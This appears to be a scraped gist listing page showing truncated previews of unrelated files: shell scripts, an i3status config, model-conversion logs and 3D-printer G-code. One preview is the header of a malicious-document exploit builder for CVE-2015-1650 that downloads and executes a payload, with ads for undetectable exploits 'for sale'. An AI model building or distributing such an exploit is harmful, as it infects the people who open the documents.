This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| # Create deletion script | |
| if [ ! -d /data/cleardata ] | |
| then | |
| echo "Creating /data/cleardata folder" | |
| mkdir /data/cleardata | |
| else | |
| echo "/data/cleardata folder already exists..." | |
| fi |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| while [[ $count -ne 0 ]] ; do | |
| ping -c 1 8.8.8.8 | |
| rc=$? | |
| if [[ $rc -eq 0 ]] ; then | |
| connection = 'true' | |
| ((count = 1)) | |
| fi | |
| ((count = count - 1)) | |
| done |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ``` | |
| ADD THE FUCKING | |
| SNIPPET | |
| HERE |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ############################################################################### | |
| # ceerious i3 status config | |
| # see "man i3status" for documentation. | |
| # | |
| # It is important that this file is edited as UTF-8. | |
| # The following line should contain a sharp s: | |
| # ß | |
| # If the above line is not correctly displayed, fix your editor first! | |
| ############################################################################### |
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #CVE-2015-1650 New Version / DL/EXEC | |
| #More Private FUD Expls For Sale | |
| #Jabber - [email protected] | |
| #Mail - [email protected] | |
| import binascii | |
| import sys | |
| import time | |
| url12= "C:\Users\Bilal Khan\Desktop\exploit collection\exploit collection\Exploit .doc Builder\builderUpdate\server.exe" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Loading ./supercombo.trt | |
| WARNING:tensorflow:From /usr/lib/python3.6/dist-packages/uff/bin/../../uff/converters/tensorflow/conversion_helpers.py:227: The name tf.gfile.GFile is deprecated. Please use tf.io.gfile.GFile instead. | |
| NOTE: UFF has been tested with TensorFlow 1.14.0. | |
| WARNING: The version of TensorFlow installed on this system is not guaranteed to work with UFF. | |
| UFF Version 0.6.5 | |
| === Automatically deduced input nodes === | |
| [name: "input_1_1" | |
| op: "Placeholder" | |
| attr { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| *********************************** | |
| * Keras2ONXX * | |
| *********************************** | |
| Converting ../../models/supercombo.keras to ./supercombo.onnx | |
| Cleaning intermediate data... | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| └─[$] <git:(Tesla_0.7.4_rebase*)> python /usr/lib/python3.6/dist-packages/uff/bin/convert_to_uff.py /data/intermediate/saved_model.pb | |
| 2020-04-21 16:50:18.971438: I tensorflow/stream_executor/platform/default/dso_loader.cc:44] Successfully opened dynamic library libcudart.so.10.0 | |
| Loading /data/intermediate/saved_model.pb | |
| WARNING:tensorflow:From /usr/lib/python3.6/dist-packages/uff/bin/../../uff/converters/tensorflow/conversion_helpers.py:227: The name tf.gfile.GFile is deprecated. Please use tf.io.gfile.GFile instead. | |
| NOTE: UFF has been tested with TensorFlow 1.14.0. | |
| WARNING: The version of TensorFlow installed on this system is not guaranteed to work with UFF. | |
| UFF Version 0.6.5 | |
| === Automatically deduced input nodes === | |
| [name: "input_1_1" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| G28 X0 Y0 Z0 ; home extruder | |
| M140 S[first_layer_bed_temperature] ; set bed temp | |
| M190 S[first_layer_bed_temperature] ; wait for bed temp | |
| G29 | |
| M104 S[first_layer_temperature] ; set extruder temp | |
| M109 S[first_layer_temperature] : wait for extruder temp |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| M104 S0 ; turn off temperature | |
| M140 S0 ; turn off Bed | |
| G1 E0 ; Retract Filament to minimize dropping filament while still cooling nozzle | |
| G1 X290 F1000 | |
| G1 Y290 F1000; | |
| M84; disable motors | |
| M107; turn off fan |